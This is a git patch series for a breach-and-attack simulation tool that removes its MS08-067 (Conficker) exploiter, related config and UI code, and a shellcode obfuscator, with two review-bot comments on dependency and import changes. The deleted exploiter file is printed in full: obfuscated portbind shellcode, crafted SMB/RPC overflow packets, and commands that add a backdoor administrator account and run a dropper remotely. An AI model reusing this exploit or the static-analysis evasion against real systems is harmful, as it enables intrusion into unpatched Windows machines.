From 3fc8621e163f5e13465e677d668debf8c76bfa11 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski
Date: Thu, 27 Jan 2022 16:42:06 +0100
Subject: [PATCH 1/4] Docs: Remove MS08_067 exploiter documentation
---
 README.md | 1 -
 docs/content/reference/exploiters/MS08-067.md | 14 --------------
 2 files changed, 15 deletions(-)
 delete mode 100644 docs/content/reference/exploiters/MS08-067.md
diff --git a/README.md b/README.md
index 1e9477ea9..6100219df 100644
--- a/README.md
+++ b/README.md
@@ -47,7 +47,6 @@ The Infection Monkey uses the following techniques and exploits to propagate to
 * SMB
 * WMI
 * Shellshock
- * Conficker
 * Elastic Search (CVE-2015-1427)
 * Weblogic server
 * and more, see our [Documentation hub](https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/) for more information about our RCE exploiters.
diff --git a/docs/content/reference/exploiters/MS08-067.md b/docs/content/reference/exploiters/MS08-067.md
deleted file mode 100644
index d4eb3b807..000000000
--- a/docs/content/reference/exploiters/MS08-067.md
+++ /dev/null
@@ -1,14 +0,0 @@
----
-title: "MS08 067"
-date: 2020-07-14T08:42:54+03:00
-draft: false
-tags: ["exploit", "windows"]
----
-
-### Description
-
-[MS08-067](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067) is a remote code execution vulnerability.
-
-This exploiter is unsafe. It's therefore **not** enabled by default.
-
-If an exploit attempt fails, this could also lead to a crash in Svchost.exe. If a crash in Svchost.exe occurs, the server service will be affected. This may cause a system crash due to the use of buffer overflow.
From ff87252a247ea3845f409865d7d3280485353845 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski
Date: Thu, 27 Jan 2022 16:45:55 +0100
Subject: [PATCH 2/4] Agent, Island: Remove MS08_67 exploiter
---
 monkey/infection_monkey/config.py | 3 -
 monkey/infection_monkey/example.conf | 2 -
 .../infection_monkey/exploit/win_ms08_067.py | 320 ------------------
 .../definitions/exploiter_classes.py | 11 -
 .../cc/services/config_schema/internal.py | 18 -
 .../exploiter_descriptor_enum.py | 1 -
 .../report-components/SecurityReport.js | 6 -
 .../security/issues/MS08_067Issue.js | 24 --
 .../monkey_configs/flat_config.json | 4 +-
 .../monkey_config_standard.json | 4 -
 vulture_allowlist.py | 2 -
 11 files changed, 1 insertion(+), 394 deletions(-)
 delete mode 100644 monkey/infection_monkey/exploit/win_ms08_067.py
 delete mode 100644 monkey/monkey_island/cc/ui/src/components/report-components/security/issues/MS08_067Issue.js
diff --git a/monkey/infection_monkey/config.py b/monkey/infection_monkey/config.py
index 81c6a9996..fca494e36 100644
--- a/monkey/infection_monkey/config.py
+++ b/monkey/infection_monkey/config.py
@@ -146,9 +146,6 @@ class Configuration(object):
 
 skip_exploit_if_file_exist = False
 
- ms08_067_exploit_attempts = 5
- user_to_add = "Monkey_IUSER_SUPPORT"
-
 ###########################
 # ransomware config
 ###########################
diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf
index 6c2bc3235..2133be9e3 100644
--- a/monkey/infection_monkey/example.conf
+++ b/monkey/infection_monkey/example.conf
@@ -43,8 +43,6 @@
 ],
 "monkey_log_path_windows": "%temp%\\~df1563.tmp",
 "monkey_log_path_linux": "/tmp/user-1563",
- "ms08_067_exploit_attempts": 5,
- "user_to_add": "Monkey_IUSER_SUPPORT",
 "ping_scan_timeout": 10000,
 "smb_download_timeout": 300,
 "smb_service_name": "InfectionMonkey",
diff --git a/monkey/infection_monkey/exploit/win_ms08_067.py b/monkey/infection_monkey/exploit/win_ms08_067.py
deleted file mode 100644
index db6df1212..000000000
--- a/monkey/infection_monkey/exploit/win_ms08_067.py
+++ /dev/null
@@ -1,320 +0,0 @@ -#!/usr/bin/env python -############################################################################# -# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled) -# www.hackingspirits.com -# www.coffeeandsecurity.com -# Email: d3basis.m0hanty @ gmail.com -############################################################################# - -import socket -import time -from enum import IntEnum -from logging import getLogger - -from impacket import uuid -from impacket.dcerpc.v5 import transport - -from common.utils.shellcode_obfuscator import clarify -from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey -from infection_monkey.exploit.tools.smb_tools import SmbTools -from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS -from infection_monkey.network.smbfinger import SMBFinger -from infection_monkey.network.tools import check_tcp_port -from infection_monkey.utils.commands import build_monkey_commandline -from infection_monkey.utils.random_password_generator import get_random_password - -logger = getLogger(__name__) - -# Portbind shellcode from metasploit; Binds port to TCP port 4444 -OBFUSCATED_SHELLCODE = ( - b"4\xf6kPF\xc5\x9bI,\xab\x1d" - b"\xa0\x92Y\x88\x1b$\xa0hK\x03\x0b\x0b\xcf\xe7\xff\x9f\x9d\xb6&J" - b"\xdf\x1b\xad\x1b5\xaf\x84\xed\x99\x01'\xa8\x03\x90\x01\xec\x13" - b"\xfb\xf9!\x11\x1dc\xd9*\xb4\xd8\x9c\xf1\xb8\xb9\xa1;\x93\xc1\x8dq" - b"\xe4\xe1\xe5?%\x1a\x96\x96\xb5\x94\x19\xb5o\x0c\xdb\x89Cq\x14M\xf8" - b"\x02\xfb\xe5\x88hL\xc4\xcdd\x90\x8bc\xff\xe3\xb8z#\x174\xbd\x00J" - b'\x1c\xc1\xccM\x94\x90tm\x89N"\xd4-' -) - -SHELLCODE = clarify(OBFUSCATED_SHELLCODE).decode() - -XP_PACKET = ( - "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43" - "\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01" - 
"\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47" - "\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48" - "\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49" - "\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a" - "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00" - "\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02" - "\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90" - "\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00" - "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00" -) - -# Payload for Windows 2000 target -PAYLOAD_2000 = "\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" -PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41" -PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41" -PAYLOAD_2000 += "\x41\x41" -PAYLOAD_2000 += "\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0" -PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" -PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" -PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" -PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" -PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" -PAYLOAD_2000 += "\xeb\xcc" -PAYLOAD_2000 += "\x00\x00" - -# Payload for Windows 2003[SP2] target -PAYLOAD_2003 = "\x41\x00\x5c\x00" -PAYLOAD_2003 += 
"\x2e\x00\x2e\x00\x5c\x00\x2e\x00" -PAYLOAD_2003 += "\x2e\x00\x5c\x00\x0a\x32\xbb\x77" -PAYLOAD_2003 += "\x8b\xc4\x66\x05\x60\x04\x8b\x00" -PAYLOAD_2003 += "\x50\xff\xd6\xff\xe0\x42\x84\xae" -PAYLOAD_2003 += "\xbb\x77\xff\xff\xff\xff\x01\x00" -PAYLOAD_2003 += "\x01\x00\x01\x00\x01\x00\x43\x43" -PAYLOAD_2003 += "\x43\x43\x37\x48\xbb\x77\xf5\xff" -PAYLOAD_2003 += "\xff\xff\xd1\x29\xbc\x77\xf4\x75" -PAYLOAD_2003 += "\xbd\x77\x44\x44\x44\x44\x9e\xf5" -PAYLOAD_2003 += "\xbb\x77\x54\x13\xbf\x77\x37\xc6" -PAYLOAD_2003 += "\xba\x77\xf9\x75\xbd\x77\x00\x00" - - -class WindowsVersion(IntEnum): - Windows2000 = 1 - Windows2003_SP2 = 2 - WindowsXP = 3 - - -class SRVSVC_Exploit(object): - TELNET_PORT = 4444 - - def __init__(self, target_addr, os_version=WindowsVersion.Windows2003_SP2, port=445): - self._port = port - self._target = target_addr - self._payload = PAYLOAD_2000 if WindowsVersion.Windows2000 == os_version else PAYLOAD_2003 - self.os_version = os_version - - def get_telnet_port(self): - """get_telnet_port() - - The port on which the Telnet service will listen. - """ - - return SRVSVC_Exploit.TELNET_PORT - - def start(self): - """start() -> socket - - Exploit the target machine and return a socket connected to it's - listening Telnet service. 
- """ - - target_rpc_name = "ncacn_np:%s[\\pipe\\browser]" % self._target - - logger.debug("Initiating exploit connection (%s)", target_rpc_name) - self._trans = transport.DCERPCTransportFactory(target_rpc_name) - self._trans.connect() - - logger.debug("Connected to %s", target_rpc_name) - - self._dce = self._trans.DCERPC_class(self._trans) - self._dce.bind(uuid.uuidtup_to_bin(("4b324fc8-1670-01d3-1278-5a47bf6ee188", "3.0"))) - - dce_packet = self._build_dce_packet() - self._dce.call(0x1F, dce_packet) # 0x1f (or 31)- NetPathCanonicalize Operation - - logger.debug("Exploit sent to %s successfully...", self._target) - logger.debug("Target machine should be listening over port %d now", self.get_telnet_port()) - - sock = socket.socket() - sock.connect((self._target, self.get_telnet_port())) - return sock - - def _build_dce_packet(self): - if self.os_version == WindowsVersion.WindowsXP: - return XP_PACKET - # Constructing Malicious Packet - dce_packet = "\x01\x00\x00\x00" - dce_packet += "\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00" - dce_packet += SHELLCODE - dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" - dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" - dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" - dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" - dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" - dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" - dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" - dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" - dce_packet += "\x00\x00\x00\x00" - dce_packet += "\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00" - dce_packet += self._payload - dce_packet += "\x00\x00\x00\x00" - dce_packet += "\x02\x00\x00\x00\x02\x00\x00\x00" - dce_packet += "\x00\x00\x00\x00\x02\x00\x00\x00" - dce_packet += "\x5c\x00\x00\x00\x01\x00\x00\x00" - dce_packet += "\x01\x00\x00\x00" - - return dce_packet - - -class Ms08_067_Exploiter(HostExploiter): - _TARGET_OS_TYPE = ["windows"] - _EXPLOITED_SERVICE = "Microsoft Server Service" - 
_windows_versions = { - "Windows Server 2003 3790 Service Pack 2": WindowsVersion.Windows2003_SP2, - "Windows Server 2003 R2 3790 Service Pack 2": WindowsVersion.Windows2003_SP2, - "Windows 5.1": WindowsVersion.WindowsXP, - } - - def __init__(self, host): - super(Ms08_067_Exploiter, self).__init__(host) - - def is_os_supported(self): - if self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get("version") in list( - self._windows_versions.keys() - ): - return True - - if not self.host.os.get("type") or ( - self.host.os.get("type") in self._TARGET_OS_TYPE and not self.host.os.get("version") - ): - is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445) - if is_smb_open: - smb_finger = SMBFinger() - if smb_finger.get_host_fingerprint(self.host): - return self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get( - "version" - ) in list(self._windows_versions.keys()) - return False - - def _exploit_host(self): - src_path = get_target_monkey(self.host) - - if not src_path: - logger.info("Can't find suitable monkey executable for host %r", self.host) - return False - - os_version = self._windows_versions.get( - self.host.os.get("version"), WindowsVersion.Windows2003_SP2 - ) - - exploited = False - random_password = get_random_password() - for _ in range(self._config.ms08_067_exploit_attempts): - exploit = SRVSVC_Exploit(target_addr=self.host.ip_addr, os_version=os_version) - - try: - sock = exploit.start() - - sock.send( - "cmd /c (net user {} {} /add) &&" - " (net localgroup administrators {} /add)\r\n".format( - self._config.user_to_add, - random_password, - self._config.user_to_add, - ).encode() - ) - time.sleep(2) - sock.recv(1000) - - logger.debug("Exploited into %r using MS08-067", self.host) - exploited = True - break - except Exception as exc: - logger.debug("Error exploiting victim %r: (%s)", self.host, exc) - continue - - if not exploited: - logger.debug("Exploiter MS08-067 is giving up...") - return False - - # copy the file remotely 
using SMB - remote_full_path = SmbTools.copy_file( - self.host, - src_path, - self._config.dropper_target_path_win_32, - self._config.user_to_add, - random_password, - ) - - if not remote_full_path: - # try other passwords for administrator - for password in self._config.exploit_password_list: - remote_full_path = SmbTools.copy_file( - self.host, - src_path, - self._config.dropper_target_path_win_32, - "Administrator", - password, - ) - if remote_full_path: - break - - if not remote_full_path: - return True - - # execute the remote dropper in case the path isn't final - if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): - cmdline = DROPPER_CMDLINE_WINDOWS % { - "dropper_path": remote_full_path - } + build_monkey_commandline( - self.host, - get_monkey_depth() - 1, - self._config.dropper_target_path_win_32, - ) - else: - cmdline = MONKEY_CMDLINE_WINDOWS % { - "monkey_path": remote_full_path - } + build_monkey_commandline(self.host, get_monkey_depth() - 1) - - try: - sock.send(("start %s\r\n" % (cmdline,)).encode()) - sock.send(("net user %s /delete\r\n" % (self._config.user_to_add,)).encode()) - except Exception as exc: - logger.debug( - "Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc - ) - return True - finally: - try: - sock.close() - except socket.error: - pass - - logger.info( - "Executed monkey '%s' on remote victim %r (cmdline=%r)", - remote_full_path, - self.host, - cmdline, - ) - - return True diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py index 56f81256b..f21bc942d 100644 --- a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py +++ b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py 
@@ -42,17 +42,6 @@ EXPLOITER_CLASSES = {
 "link": "https://www.guardicore.com/infectionmonkey/docs/reference"
 "/exploiters/mssql/",
 },
- {
- "type": "string",
- "enum": ["Ms08_067_Exploiter"],
- "title": "MS08-067 Exploiter",
- "safe": False,
- "info": "Unsafe exploiter, that might cause system crash due to the use of buffer "
- "overflow. "
- "Uses MS08-067 vulnerability.",
- "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/ms08"
- "-067/",
- },
 {
 "type": "string",
 "enum": ["SSHExploiter"],
diff --git a/monkey/monkey_island/cc/services/config_schema/internal.py b/monkey/monkey_island/cc/services/config_schema/internal.py
index ff5ad4e72..94a1f3603 100644
--- a/monkey/monkey_island/cc/services/config_schema/internal.py
+++ b/monkey/monkey_island/cc/services/config_schema/internal.py
@@ -266,24 +266,6 @@ INTERNAL = {
 }
 },
 },
- "ms08_067": {
- "title": "MS08_067",
- "type": "object",
- "properties": {
- "ms08_067_exploit_attempts": {
- "title": "MS08_067 exploit attempts",
- "type": "integer",
- "default": 5,
- "description": "Number of attempts to exploit using MS08_067",
- },
- "user_to_add": {
- "title": "Remote user",
- "type": "string",
- "default": "Monkey_IUSER_SUPPORT",
- "description": "Username to add on successful exploit",
- },
- },
- },
 },
 "smb_service": {
 "title": "SMB service",
diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
index 7d7921b8b..1555b4b61 100644
--- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
+++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
@@ -34,7 +34,6 @@ class ExploiterDescriptorEnum(Enum):
 ELASTIC = ExploiterDescriptor(
 "ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
 )
- MS08_067 = ExploiterDescriptor("Ms08_067_Exploiter", "Conficker Exploiter", ExploitProcessor)
 SHELLSHOCK = ExploiterDescriptor(
 "ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor
 )
diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js
index 63d1d7e6f..270db721a 100644
--- a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js
+++ b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js
@@ -30,7 +30,6 @@ import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues
 import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue';
 import {shellShockIssueOverview, shellShockIssueReport} from './security/issues/ShellShockIssue';
 import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
-import {ms08_067IssueOverview, ms08_067IssueReport} from './security/issues/MS08_067Issue';
 import {
 crossSegmentIssueOverview,
 crossSegmentIssueReport,
@@ -136,11 +135,6 @@ class ReportPageComponent extends AuthComponent {
 [this.issueContentTypes.REPORT]: powershellIssueReport,
 [this.issueContentTypes.TYPE]: this.issueTypes.DANGER
 },
- 'Ms08_067_Exploiter': {
- [this.issueContentTypes.OVERVIEW]: ms08_067IssueOverview,
- [this.issueContentTypes.REPORT]: ms08_067IssueReport,
- [this.issueContentTypes.TYPE]: this.issueTypes.DANGER
- },
 'ZerologonExploiter': {
 [this.issueContentTypes.OVERVIEW]: zerologonIssueOverview,
 [this.issueContentTypes.REPORT]: zerologonIssueReport,
diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/MS08_067Issue.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/MS08_067Issue.js deleted file mode 100644 index 2a831a093..000000000 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/MS08_067Issue.js +++ /dev/null @@ -1,24 +0,0 @@ -import React from 'react'; -import CollapsibleWellComponent from '../CollapsibleWell'; - -export function ms08_067IssueOverview() { - return (
  • Machines are vulnerable to ‘Conficker’ (MS08-067).
  • ) -} - -export function ms08_067IssueReport(issue) { - return ( - <> - Install the latest Windows updates or upgrade to a newer operating system. - - The machine {issue.machine} ({issue.ip_address}) is vulnerable to a Conficker attack. -
    - The attack was made possible because the target machine used an outdated and unpatched operating system - vulnerable to Conficker. -
    - - ); -} diff --git a/monkey/tests/data_for_tests/monkey_configs/flat_config.json b/monkey/tests/data_for_tests/monkey_configs/flat_config.json index 2840cbbb5..4f6704d9b 100644 --- a/monkey/tests/data_for_tests/monkey_configs/flat_config.json +++ b/monkey/tests/data_for_tests/monkey_configs/flat_config.json @@ -76,7 +76,6 @@ "max_depth": null, "monkey_log_path_linux": "/tmp/user-1563", "monkey_log_path_windows": "%temp%\\~df1563.tmp", - "ms08_067_exploit_attempts": 5, "ping_scan_timeout": 1000, "post_breach_actions": [ "CommunicateAsBackdoorUser", @@ -120,6 +119,5 @@ 3306, 7001, 8088 - ], - "user_to_add": "Monkey_IUSER_SUPPORT" + ] } diff --git a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json index fc9f2bb05..b810d4356 100644 --- a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json +++ b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json @@ -121,10 +121,6 @@ "exploit_ssh_keys": [], "general": { "skip_exploit_if_file_exist": false - }, - "ms08_067": { - "ms08_067_exploit_attempts": 5, - "user_to_add": "Monkey_IUSER_SUPPORT" } }, "testing": { diff --git a/vulture_allowlist.py b/vulture_allowlist.py index 926863a6d..2f7598379 100644 --- a/vulture_allowlist.py +++ b/vulture_allowlist.py 
@@ -59,7 +59,6 @@ password_restored # unused variable (monkey/monkey_island/cc/services/reporting
 SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
 SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
 ELASTIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32)
-MS08_067 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:35)
 SHELLSHOCK # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:36)
 STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
 WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
@@ -129,7 +128,6 @@ ts # unused variable (monkey/infection_monkey/exploit/zerologon_utils/options.p
 opnum # unused variable (monkey/infection_monkey/exploit/zerologon.py:466)
 structure # unused variable (monkey/infection_monkey/exploit/zerologon.py:467)
 structure # unused variable (monkey/infection_monkey/exploit/zerologon.py:478)
-_._port # unused attribute (monkey/infection_monkey/exploit/win_ms08_067.py:123)
 oid_set # unused variable (monkey/infection_monkey/exploit/tools/wmi_tools.py:96)
 export_monkey_telems # unused variable (monkey/infection_monkey/config.py:282)
 NoInternetError # unused class (monkey/common/utils/exceptions.py:33)
From ceec121d880539a0e4ed9baa954636f718fda621 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski
Date: Thu, 27 Jan 2022 16:46:30 +0100
Subject: [PATCH 3/4] Agent: Remove shellcode obfusctor Encryptor which was used in MS08-067 exploiter.
---
 monkey/common/utils/shellcode_obfuscator.py | 30 -------------------
 monkey/infection_monkey/Pipfile | 1 -
 .../common/utils/test_shellcode_obfuscator.py | 14 ---------
 .../master/test_propagator.py | 7 ++---
 4 files changed, 2 insertions(+), 50 deletions(-)
 delete mode 100644 monkey/common/utils/shellcode_obfuscator.py
 delete mode 100644 monkey/tests/unit_tests/common/utils/test_shellcode_obfuscator.py
diff --git a/monkey/common/utils/shellcode_obfuscator.py b/monkey/common/utils/shellcode_obfuscator.py
deleted file mode 100644
index 11635201e..000000000
--- a/monkey/common/utils/shellcode_obfuscator.py
+++ /dev/null
@@ -1,30 +0,0 @@
-# This code is used to obfuscate shellcode
-# Usage:
-# shellcode_obfuscator.py [your normal shellcode].
-
-import sys
-
-# PyCrypto is deprecated, but we use pycryptodome, which uses the exact same imports
-from Crypto.Cipher import AES # noqa: DUO133 # nosec: B413
-
-# We only encrypt payloads to hide them from static analysis
-# it's OK to have these keys plaintext
-KEY = b"1234567890123456"
-NONCE = b"\x93n2\xbc\xf5\x8d:\xc2fP\xabn\x02\xb3\x17f"
-
-
-# Use this manually to get obfuscated bytes of shellcode
-def obfuscate(shellcode: bytes) -> bytes:
- cipher = AES.new(KEY, AES.MODE_EAX, nonce=NONCE)
- ciphertext, _ = cipher.encrypt_and_digest(shellcode)
- return ciphertext
-
-
-def clarify(shellcode: bytes) -> bytes:
- cipher = AES.new(KEY, AES.MODE_EAX, nonce=NONCE)
- plaintext = cipher.decrypt(shellcode)
- return plaintext
-
-
-if __name__ == "__main__":
- print(obfuscate(sys.argv[1].encode()))
diff --git a/monkey/infection_monkey/Pipfile b/monkey/infection_monkey/Pipfile
index 728e42a4f..60def5d44 100644
--- a/monkey/infection_monkey/Pipfile
+++ b/monkey/infection_monkey/Pipfile
@@ -23,7 +23,6 @@ ScoutSuite = {git = "git://github.com/guardicode/ScoutSuite"}
 pyopenssl = "==19.0.0" # We can't build 32bit ubuntu12 binary with newer versions of pyopenssl
 pypsrp = "*"
 typing-extensions = "*" # Allows us to use 3.9 typing features on 3.7 project
-pycryptodome = "*" # Used in common/utils/shellcode_obfuscator.py
 altgraph = "*" # Required for pyinstaller branch, without it agents fail to build
 pysmb = "*"
 "WinSys-3.x" = "*"
diff --git a/monkey/tests/unit_tests/common/utils/test_shellcode_obfuscator.py b/monkey/tests/unit_tests/common/utils/test_shellcode_obfuscator.py
deleted file mode 100644
index bda9f7996..000000000
--- a/monkey/tests/unit_tests/common/utils/test_shellcode_obfuscator.py
+++ /dev/null
@@ -1,14 +0,0 @@
-from unittest import TestCase
-
-from common.utils.shellcode_obfuscator import clarify, obfuscate
-
-SHELLCODE = b"1234567890abcd"
-OBFUSCATED_SHELLCODE = b"\xc7T\x9a\xf4\xb1cn\x94\xb0X\xf2\xfb^="
-
-
-class TestShellcodeObfuscator(TestCase):
- def test_obfuscate(self):
- assert obfuscate(SHELLCODE) == OBFUSCATED_SHELLCODE
-
- def test_clarify(self):
- assert clarify(OBFUSCATED_SHELLCODE) == SHELLCODE
diff --git a/monkey/tests/unit_tests/infection_monkey/master/test_propagator.py b/monkey/tests/unit_tests/infection_monkey/master/test_propagator.py
index 745e075fa..0e54f2a4e 100644
--- a/monkey/tests/unit_tests/infection_monkey/master/test_propagator.py
+++ b/monkey/tests/unit_tests/infection_monkey/master/test_propagator.py
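Review bot: Dropping `pycryptodome = "*"` from the agent Pipfile is not matched by a lock-file change anywhere in this series — the diffstat for this patch lists only four files — so if the project commits a Pipfile.lock it will still pin the package and `pipenv install --deploy` will fail on the Pipfile/lock mismatch; regenerate the lock in the same commit. The removed trailing comment names `common/utils/shellcode_obfuscator.py` as the consumer, but nothing in the hunk shows that no other `from Crypto` import remains in the agent, so that should be confirmed before the dependency goes, and it is worth a line in the commit message.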
@@ -11,12 +11,9 @@ from infection_monkey.i_puppet import (
 PortStatus,
 )
 from infection_monkey.master import IPScanResults, Propagator
-from infection_monkey.network import NetworkInterface
-from infection_monkey.telemetry.exploit_telem import ExploitTelem
 from infection_monkey.model import VictimHost, VictimHostFactory
-from infection_monkey.network import NetworkAddress
-
-
+from infection_monkey.network import NetworkAddress, NetworkInterface
+from infection_monkey.telemetry.exploit_telem import ExploitTelem
 
 
 @pytest.fixture
From d257276f30188ff704dafb7aa9ed676d94bba050 Mon Sep 17 00:00:00 2001
From: Mike Salvatore
Date: Mon, 31 Jan 2022 08:15:43 -0500
Subject: [PATCH 4/4] Changelog: Add entry for removal of MS08-067 exploiter
---
 CHANGELOG.md | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index df5828bc6..054e7b749 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -19,7 +19,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
 clearer instructions to the user and avoid confusion. #1684
 
 ### Removed
-- The VSFTPD exploiter. #1533
+- VSFTPD exploiter. #1533
 - Manual agent run command for CMD. #1570
 - Sambacry exploiter. #1567
 - "Kill file" option in the config. #1536
@@ -40,6 +40,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
 - "GET /api/monkey_control/check_remote_port/" endpoint. #1635
 - Max victims to find/exploit, TCP scan interval and TCP scan get banner internal options. #1597
 - MySQL fingerprinter. #1648
+- MS08-067 (Conficker) exploiter. #1677
 
 ### Fixed
 - A bug in network map page that caused delay of telemetry log loading. #1545
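Review bot: The import reshuffle in test_propagator.py is unrelated to the shellcode-obfuscator removal this commit describes, and the commit message does not mention the file; either note the drive-by lint fix in the message or move it to its own commit so the series reads as pure removals. The net change is merging the two `infection_monkey.network` imports into `from infection_monkey.network import NetworkAddress, NetworkInterface`, re-sorting the `exploit_telem` import after it, and removing two surplus blank lines, so the same four names stay imported. From the hunk counts (12 old, 9 new) two blank context lines remain before `@pytest.fixture`, which keeps the usual two-blank-lines-before-a-top-level-definition rule satisfied.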